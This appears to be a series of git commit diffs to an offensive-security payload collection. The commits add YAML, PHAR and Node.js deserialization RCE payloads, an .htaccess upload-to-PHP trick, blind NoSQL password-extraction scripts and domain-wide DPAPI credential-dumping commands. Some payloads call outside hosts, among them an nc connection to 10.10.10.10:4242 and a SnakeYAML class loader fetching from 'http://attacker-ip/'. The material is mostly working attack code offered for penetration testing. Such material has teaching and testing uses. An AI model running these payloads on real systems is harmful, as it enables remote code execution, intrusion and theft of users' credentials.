## References - [Github - ysoserial](https://github.com/frohoff/ysoserial) +- [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/) +- [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau | Mar 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/) - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) - [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) - [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) - [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html) - [On Jackson CVEs: Don’t Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96) -- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464) \ No newline at end of file +- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464) diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index 14df571..6faf500 100644 --- a/Insecure Deserialization/README.md +++ b/Insecure Deserialization/README.md @@ -8,6 +8,7 @@ Check the following sub-sections, located in other files : * [PHP (Object injection) : phpggc, ...](PHP.md) * [Ruby : universal rce gadget, ...](Ruby.md) * [Python : pickle, ...](Python.md) +* [YAML : PyYAML, ...](YAML.md) ## References diff --git a/Insecure Deserialization/Ruby.md b/Insecure Deserialization/Ruby.md index 79c91e7..c3f2fa6 100644 --- a/Insecure Deserialization/Ruby.md +++ b/Insecure Deserialization/Ruby.md @@ -59,4 +59,5 @@ Universal gadget for ruby 2.x - 3.x. - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/) - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) -- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/) \ No newline at end of file +- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/) +* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/) \ No newline at end of file diff --git a/Insecure Deserialization/YAML.md b/Insecure Deserialization/YAML.md new file mode 100644 index 0000000..326394c --- /dev/null +++ b/Insecure Deserialization/YAML.md @@ -0,0 +1,89 @@ +# YAML Deserialization + +## Summary + +* [Tools](#tools) +* [Exploit](#exploit) + * [PyYAML](#pyyaml) + * [ruamel.yaml](#ruamelyaml) + * [Ruby](#ruby) + * [SnakeYAML](#snakeyaml) +* [References](#references) + +## Tools + +* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) +* [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload) - A tiny project for generating SnakeYAML deserialization payloads +* [mbechler/marshalsec](https://github.com/mbechler/marshalsec) + +## Exploit + +### PyYAML + +```yaml +!!python/object/apply:time.sleep [10] +!!python/object/apply:builtins.range [1, 10, 1] +!!python/object/apply:os.system ["nc 10.10.10.10 4242"] +!!python/object/apply:os.popen ["nc 10.10.10.10 4242"] +!!python/object/new:subprocess [["ls","-ail"]] +!!python/object/new:subprocess.check_output [["ls","-ail"]] +``` + +```yaml +!!python/object/apply:subprocess.Popen +- ls +``` + +```yaml +!!python/object/new:str +state: !!python/tuple +- 'print(getattr(open("flag\x2etxt"), "read")())' +- !!python/object/new:Warning + state: + update: !!python/name:exec +``` + +## Ruamel.yaml + +## Ruby + +```ruby + --- + - !ruby/object:Gem::Installer + i: x + - !ruby/object:Gem::SpecFetcher + i: y + - !ruby/object:Gem::Requirement + requirements: + !ruby/object:Gem::Package::TarReader + io: &1 !ruby/object:Net::BufferedIO + io: &1 !ruby/object:Gem::Package::TarReader::Entry + read: 0 + header: "abc" + debug_output: &1 !ruby/object:Net::WriteAdapter + socket: &1 !ruby/object:Gem::RequestSet + sets: !ruby/object:Net::WriteAdapter + socket: !ruby/module 'Kernel' + method_id: :system + git_set: sleep 600 + method_id: :resolve +``` + +## SnakeYAML + +```yaml +!!javax.script.ScriptEngineManager [ + !!java.net.URLClassLoader [[ + !!java.net.URL ["http://attacker-ip/"] + ]] +] +``` + + +## References + +* [Python Yaml Deserialization - hacktricks.xyz][https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization] +* [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13][https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf] +* [PyYAML Documentation](https://pyyaml.org/wiki/PyYAMLDocumentation) +* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/) +* [[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/) \ No newline at end of file diff --git a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files new file mode 100644 index 0000000..64b38fb --- /dev/null +++ b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files @@ -0,0 +1 @@ +AddType application/x-httpd-php .rce \ No newline at end of file diff --git a/Upload Insecure Files/Configuration Apache .htaccess/README.md b/Upload Insecure Files/Configuration Apache .htaccess/README.md index 30b059d..a340e91 100644 --- a/Upload Insecure Files/Configuration Apache .htaccess/README.md +++ b/Upload Insecure Files/Configuration Apache .htaccess/README.md @@ -25,6 +25,11 @@ AddType application/x-httpd-php .htaccess &1"); ?> ``` +# .htaccess simple php + +Upload an .htaccess with : `AddType application/x-httpd-php .rce` +Then upload any file with `.rce` extension. + # .htaccess upload as image If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot. From 885f8bdb8f731c5f2ae3b0a72b3df0f08ac19f16 Mon Sep 17 00:00:00 2001 From: Processus Thief Date: Tue, 20 Sep 2022 16:56:07 +0200 Subject: [PATCH 37/69] Adding Hekatomb.py to DPAPI credentials stealing Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers. Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials. More infos here : https://github.com/Processus-Thief/HEKATOMB --- Methodology and Resources/Windows - Mimikatz.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 176fc6d..7ed1f55 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -14,6 +14,7 @@ * [Chrome Cookies & Credential](#chrome-cookies--credential) * [Task Scheduled credentials](#task-scheduled-credentials) * [Vault](#vault) +* [Hekatomb - Steal all credentials on domain](#hekatomb---Steal-all-credentials-on-domain) * [Mimikatz - Commands list](#mimikatz---commands-list) * [Mimikatz - Powershell version](#mimikatz---powershell-version) * [References](#references) @@ -235,6 +236,22 @@ Attributes : 0 vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\" ``` +### Hekatomb - Steal all credentials on domain + +> Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. + +> Then it will download all DPAPI blob of all users from all computers. + +> Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials. + +```python +python3 hekatomb.py -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp +``` + +https://github.com/Processus-Thief/HEKATOMB + +![Data in memory](https://docs.lestutosdeprocessus.fr/hekatomb.png) + ## Mimikatz - Commands list From 3e68276fb7c3db79b78fe3e67e08f23a48b3e9e6 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:28:57 +0200 Subject: [PATCH 38/69] add 3 template engines + add lang in menu --- Server Side Template Injection/README.md | 143 +++++++++++++++++++++-- 1 file changed, 133 insertions(+), 10 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index c911119..4aeb0ab 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -15,7 +15,7 @@ - [Expression Language EL - Basic injection](#expression-language-el---basic-injection) - [Expression Language EL - One-Liner injections not including code execution](#expression-language-el---one-liner-injections-not-including-code-execution) - [Expression Language EL - Code Execution](#expression-language-el---code-execution) - - [Freemarker](#freemarker) + - [Java - Freemarker](#freemarker) - [Freemarker - Basic injection](#freemarker---basic-injection) - [Freemarker - Read File](#freemarker---read-file) - [Freemarker - Code execution](#freemarker---code-execution) @@ -26,7 +26,7 @@ - [Groovy - HTTP request:](#groovy---http-request) - [Groovy - Command Execution](#groovy---command-execution) - [Groovy - Sandbox Bypass](#groovy---sandbox-bypass) - - [Handlebars](#handlebars) + - [JavaScript - Handlebars](#handlebars) - [Handlebars - Command Execution](#handlebars---command-execution) - [Jade / Codepen](#jade--codepen) - [Java](#java) @@ -34,7 +34,7 @@ - [Java - Retrieve the system’s environment variables](#java---retrieve-the-systems-environment-variables) - [Java - Retrieve /etc/passwd](#java---retrieve-etcpasswd) - [Django Template](#django-template) - - [Jinja2](#jinja2) + - [Python - Jinja2](#jinja2) - [Jinja2 - Basic injection](#jinja2---basic-injection) - [Jinja2 - Template format](#jinja2---template-format) - [Jinja2 - Debug Statement](#jinja2---debug-statement) @@ -48,16 +48,16 @@ - [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset) - [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file) - [Jinja2 - Filter bypass](#jinja2---filter-bypass) - - [Jinjava](#jinjava) + - [Java - Jinjava](#jinjava) - [Jinjava - Basic injection](#jinjava---basic-injection) - [Jinjava - Command execution](#jinjava---command-execution) - - [Lessjs](#lessjs) + - [JavaScript - Lessjs](#lessjs) - [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi) - [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution) - [Plugins](#plugins) - - [Mako](#mako) + - [Python - Mako](#mako) - [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace) - - [Pebble](#pebble) + - [Java - Pebble](#pebble) - [Pebble - Basic injection](#pebble---basic-injection) - [Pebble - Code execution](#pebble---code-execution) - [Ruby](#ruby) @@ -65,13 +65,16 @@ - [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd) - [Ruby - List files and directories](#ruby---list-files-and-directories) - [Ruby - Code execution](#ruby---code-execution) - - [Smarty](#smarty) - - [Twig](#twig) + - [PHP - Smarty](#smarty) + - [PHP - Twig](#twig) - [Twig - Basic injection](#twig---basic-injection) - [Twig - Template format](#twig---template-format) - [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading) - [Twig - Code execution](#twig---code-execution) - - [Velocity](#velocity) + - [Java - Velocity](#velocity) + - [PHP - patTemplate](#pattemplate) + - [PHP - PHPlib](#phplib-and-html_template_phplib) + - [PHP - Plates](#plates) - [References](#references) ## Tools @@ -945,6 +948,126 @@ $str.valueOf($chr.toChars($out.read())) --- +## patTemplate + +> [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts + +```xml + + This is the main page. + + It contains another template. + + + Hello {NAME}.
+
+
+``` + +--- + +## PHPlib and HTML_Template_PHPLIB + +[HTML_Template_PHPLIB](https://github.com/pear/HTML_Template_PHPLIB) is the same as PHPlib but ported to Pear. + +`authors.tpl` + +```html + + {PAGE_TITLE} + + + + + + + + + + + + + + +
Authors
NameEmail
{NUM_AUTHORS}
{AUTHOR_NAME}{AUTHOR_EMAIL}
+ + +``` + +`authors.php` + +```php + 'cweiske@php.net', + 'Bjoern Schotte' => 'schotte@mayflower.de' +); + +require_once 'HTML/Template/PHPLIB.php'; +//create template object +$t =& new HTML_Template_PHPLIB(dirname(__FILE__), 'keep'); +//load file +$t->setFile('authors', 'authors.tpl'); +//set block +$t->setBlock('authors', 'authorline', 'authorline_ref'); + +//set some variables +$t->setVar('NUM_AUTHORS', count($authors)); +$t->setVar('PAGE_TITLE', 'Code authors as of ' . date('Y-m-d')); + +//display the authors +foreach ($authors as $name => $email) { + $t->setVar('AUTHOR_NAME', $name); + $t->setVar('AUTHOR_EMAIL', $email); + $t->parse('authorline_ref', 'authorline', true); +} + +//finish and echo +echo $t->finish($t->parse('OUT', 'authors')); +?> +``` + +--- + +## Plates + +Plates is inspired by Twig but a native PHP template engine instead of a compiled template engine. + +controller: + +```php +// Create new Plates instance +$templates = new League\Plates\Engine('/path/to/templates'); + +// Render a template +echo $templates->render('profile', ['name' => 'Jonathan']); +``` + +page template: + +```php +layout('template', ['title' => 'User Profile']) ?> + +

User Profile

+

Hello, e($name)?>

+``` + +layout template: + +```php + + + <?=$this->e($title)?> + + + section('content')?> + + +``` + +--- + ## References * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) From 8d564ff78b381b9c772d64822377a441181a6d76 Mon Sep 17 00:00:00 2001 From: Processus Thief Date: Thu, 22 Sep 2022 16:10:20 +0200 Subject: [PATCH 39/69] update hekatomb to install with pip hekatomb is now available on pypi to simplify its installation --- Methodology and Resources/Windows - Mimikatz.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 7ed1f55..e347fad 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -245,12 +245,13 @@ vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\" > Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials. ```python -python3 hekatomb.py -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp +pip3 install hekatomb +hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp ``` https://github.com/Processus-Thief/HEKATOMB -![Data in memory](https://docs.lestutosdeprocessus.fr/hekatomb.png) +![Data in memory](https://github.com/Processus-Thief/HEKATOMB/raw/main/.assets/github1.png) ## Mimikatz - Commands list From 2d30e221215736081ea692b7bb386357e24b7130 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 23 Sep 2022 00:35:34 +0200 Subject: [PATCH 40/69] DPAPI - Data Protection API --- GraphQL Injection/README.md | 1 + Insecure Deserialization/PHP.md | 85 +++++++++++------- Methodology and Resources/Windows - DPAPI.md | 86 +++++++++++++++++++ .../Windows - Mimikatz.md | 19 ---- Upload Insecure Files/README.md | 3 +- 5 files changed, 145 insertions(+), 49 deletions(-) create mode 100644 Methodology and Resources/Windows - DPAPI.md diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index fe33086..7ce3854 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -33,6 +33,7 @@ * [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql) * [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/) * [AutoGraphql + introspection](https://graphql-dashboard.herokuapp.com/) +* [CrackQL - A GraphQL password brute-force and fuzzing utility.](https://github.com/nicholasaleks/CrackQL) ## Exploit diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md index 06d466f..46f73b9 100644 --- a/Insecure Deserialization/PHP.md +++ b/Insecure Deserialization/PHP.md @@ -119,7 +119,7 @@ a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;} ## Finding and using gadgets -Also called "PHP POP Chains", they can be used to gain RCE on the system. +Also called `"PHP POP Chains"`, they can be used to gain RCE on the system. [PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks: @@ -141,42 +141,68 @@ Using `phar://` wrapper, one can trigger a deserialization on the specified file A valid PHAR includes four elements: -1. Stub -2. Manifest -3. File Contents -4. Signature +1. **Stub**: The stub is a chunk of PHP code which is executed when the file is accessed in an executable context. At a minimum, the stub must contain `__HALT_COMPILER();` at its conclusion. Otherwise, there are no restrictions on the contents of a Phar stub. +2. **Manifest**: Contains metadata about the archive and its contents. +3. **File Contents**: Contains the actual files in the archive. +4. **Signature**(optional): For verifying archive integrity. -Example of a Phar creation in order to exploit a custom `PDFGenerator`. -```php -callback = "passthru"; -$dummy->fileName = "uname -a > pwned"; //our payload + //Create a new instance of the Dummy class and modify its property + $dummy = new PDFGenerator(); + $dummy->callback = "passthru"; + $dummy->fileName = "uname -a > pwned"; //our payload -// Delete any existing PHAR archive with that name -@unlink("poc.phar"); + // Delete any existing PHAR archive with that name + @unlink("poc.phar"); -// Create a new archive -$poc = new Phar("poc.phar"); + // Create a new archive + $poc = new Phar("poc.phar"); -// Add all write operations to a buffer, without modifying the archive on disk -$poc->startBuffering(); + // Add all write operations to a buffer, without modifying the archive on disk + $poc->startBuffering(); -// Set the stub -$poc->setStub("setStub("setMetadata($dummy); -// Stop buffering and write changes to disk -$poc->stopBuffering(); -?> -``` + /* Add a new file in the archive with "text" as its content*/ + $poc["file"] = "text"; + // Add the dummy object to the metadata. This will be serialized + $poc->setMetadata($dummy); + // Stop buffering and write changes to disk + $poc->stopBuffering(); + ?> + ``` + +* Example of a Phar creation with a `JPEG` magic byte header since there is no restriction on the content of stub. + ```php + data = $data; + } + + function __destruct() { + system($this->data); + } + } + + // create new Phar + $phar = new Phar('test.phar'); + $phar->startBuffering(); + $phar->addFromString('test.txt', 'text'); + $phar->setStub("\xff\xd8\xff\n"); + + // add object of any class as meta data + $object = new AnyClass('whoami'); + $phar->setMetadata($object); + $phar->stopBuffering(); + ``` ## Real world examples @@ -200,3 +226,4 @@ $poc->stopBuffering(); * [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41) * [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/) * [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/) +* [phar:// deserialization - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization) \ No newline at end of file diff --git a/Methodology and Resources/Windows - DPAPI.md b/Methodology and Resources/Windows - DPAPI.md new file mode 100644 index 0000000..1126fc6 --- /dev/null +++ b/Methodology and Resources/Windows - DPAPI.md @@ -0,0 +1,86 @@ +# Windows - DPAPI + +> On Windows, credentials saved in the Windows Credentials Manager are encrypted using Microsoft's Data Protection API and stored as "blob" files in user AppData folder. + +## Summary + +* [Data Protection API](#data-protection-api) + * [List Credential Files](#list-credential-files) + * [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) + * [Hekatomb - Steal all credentials on domain](#hekatomb---steal-all-credentials-on-domain) + * [DonPAPI - Dumping DPAPI credz remotely](#donpapi---dumping-dpapi-credz-remotely) + + +## Data Protection API + +* Outside of a domain: the user's `password hash` is used to encrypt these "blobs". +* Inside a domain: the `domain controller's master key` is used to encrypt these blobs. + +With the extracted private key of the domain controller, it is possible to decrypt all the blobs, and therefore to recover all the secrets recorded in the Windows identification manager of all the work +stations in the domain. + +```ps1 +vaultcmd /list + +VaultCmd /listcreds:| /all +vaultcmd /listcreds:"Windows Credentials" /all +``` + +### List Credential Files + +```ps1 +dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\ +dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\ + +Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\ +Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\ +``` + + +### Mimikatz - Credential Manager & DPAPI + +```powershell +# check the folder to find credentials +dir C:\Users\\AppData\Local\Microsoft\Credentials\* + +# check the file with mimikatz +mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 +# find master key +mimikatz !sekurlsa::dpapi +# use master key +mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b + +# find and export backup keys +lsadump::backupkeys /system:dc01.lab.local /export +# use backup keys +dpapi::masterkey /in:"C:\Users\\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk +``` + +### Hekatomb - Steal all credentials on domain + +> [Processus-Thief/Hekatomb](https://github.com/Processus-Thief/HEKATOMB) is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers. Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials. + +```python +pip3 install hekatomb +hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp +``` + +![Data in memory](https://github.com/Processus-Thief/HEKATOMB/raw/main/.assets/github1.png) + +### DonPAPI - Dumping DPAPI credz remotely + +* [login-securite/DonPAPI](https://github.com/login-securite/DonPAPI) + +```ps1 +DonPAPI.py domain/user:passw0rd@target +DonPAPI.py --hashes : domain/user@target + +# using domain backup key +dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip +python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list +``` + +## References + +* [DPAPI - Extracting Passwords - HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) +* [DON PAPI, OU L’ART D’ALLER PLUS LOIN QUE LE DOMAIN ADMIN - LoginSecurité - CORTO GUEGUEN - 4 MARS 2022](https://www.login-securite.com/2022/03/04/don-papi-ou-lart-daller-plus-loin-que-le-avec-dpapi/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index e347fad..049a66e 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -14,7 +14,6 @@ * [Chrome Cookies & Credential](#chrome-cookies--credential) * [Task Scheduled credentials](#task-scheduled-credentials) * [Vault](#vault) -* [Hekatomb - Steal all credentials on domain](#hekatomb---Steal-all-credentials-on-domain) * [Mimikatz - Commands list](#mimikatz---commands-list) * [Mimikatz - Powershell version](#mimikatz---powershell-version) * [References](#references) @@ -236,24 +235,6 @@ Attributes : 0 vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\" ``` -### Hekatomb - Steal all credentials on domain - -> Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. - -> Then it will download all DPAPI blob of all users from all computers. - -> Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials. - -```python -pip3 install hekatomb -hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp -``` - -https://github.com/Processus-Thief/HEKATOMB - -![Data in memory](https://github.com/Processus-Thief/HEKATOMB/raw/main/.assets/github1.png) - - ## Mimikatz - Commands list | Command |Definition| diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index b193d72..1eb363d 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -204,4 +204,5 @@ Upload the XML file to `$JETTY_BASE/webapps/` * [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) * [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload) * [Injection points in popular image formats - Daniel Kalinowski‌‌ - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/) -* [A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm](https://twitter.com/ptswarm/status/1555184661751648256/) \ No newline at end of file +* [A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm](https://twitter.com/ptswarm/status/1555184661751648256/) +* [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/) From 7e2fa15462fa8b9e8dfb0215c4ad4b4f4e81f248 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 23 Sep 2022 00:36:41 +0200 Subject: [PATCH 41/69] Blind NoSQL scripts - add missing menu item - use better string interpolation for python script - add ruby script --- NoSQL Injection/README.md | 39 ++++++++++++++++++++++++++++++++++++--- 1 file changed, 36 insertions(+), 3 deletions(-) diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index 5ae3a78..12fbf15 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md @@ -11,6 +11,7 @@ * [Extract data information](#extract-data-information) * [Blind NoSQL](#blind-nosql) * [POST with JSON body](#post-with-json-body) + * [POST with urlencoded body](#post-with-urlencoded-body) * [GET](#get) * [MongoDB Payloads](#mongodb-payloads) * [References](#references) @@ -84,6 +85,7 @@ Extract data with "in" ### POST with JSON body +python script: ```python import requests @@ -109,6 +111,8 @@ while True: ### POST with urlencoded body +python script: + ```python import requests import urllib3 @@ -133,6 +137,8 @@ while True: ### GET +python script: + ```python import requests import urllib3 @@ -147,13 +153,40 @@ u='http://example.org/login' while True: for c in string.printable: if c not in ['*','+','.','?','|', '#', '&', '$']: - payload='?username=%s&password[$regex]=^%s' % (username, password + c) + payload=f"?username={username}&password[$regex]=^{password + c}" r = requests.get(u + payload) if 'Yeah' in r.text: - print("Found one more char : %s" % (password+c)) + print(f"Found one more char : {password+c}") password += c ``` +ruby script: + +```ruby +require 'httpx' + +username = 'admin' +password = '' +url = 'http://example.org/login' +# CHARSET = (?!..?~).to_a # all ASCII printable characters +CHARSET = [*'0'..'9',*'a'..'z','-'] # alphanumeric + '-' +GET_EXCLUDE = ['*','+','.','?','|', '#', '&', '$'] +session = HTTPX.plugin(:persistent) + +while true + CHARSET.each do |c| + unless GET_EXCLUDE.include?(c) + payload = "?username=#{username}&password[$regex]=^#{password + c}" + res = session.get(url + payload) + if res.body.to_s.match?('Yeah') + puts "Found one more char : #{password + c}" + password += c + end + end + end +end +``` + ## MongoDB Payloads ```bash @@ -185,4 +218,4 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi * [Testing for NoSQL injection - OWASP/WSTG](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection) * [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists) * [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb) -* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java) \ No newline at end of file +* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java) From 72a8556dc91b4700a75461dd544fade14d8c87d0 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 23 Sep 2022 11:21:29 +0200 Subject: [PATCH 42/69] NodeJS Serialization --- .../Files/node-serialize.js | 5 +++ Insecure Deserialization/Node.md | 34 +++++++++++++++++++ .../Windows - Privilege Escalation.md | 11 +++++- 3 files changed, 49 insertions(+), 1 deletion(-) create mode 100644 Insecure Deserialization/Files/node-serialize.js create mode 100644 Insecure Deserialization/Node.md diff --git a/Insecure Deserialization/Files/node-serialize.js b/Insecure Deserialization/Files/node-serialize.js new file mode 100644 index 0000000..a22304c --- /dev/null +++ b/Insecure Deserialization/Files/node-serialize.js @@ -0,0 +1,5 @@ +var y = { + rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}, +} +var serialize = require('node-serialize'); +console.log("Serialized: \n" + serialize.serialize(y)); \ No newline at end of file diff --git a/Insecure Deserialization/Node.md b/Insecure Deserialization/Node.md new file mode 100644 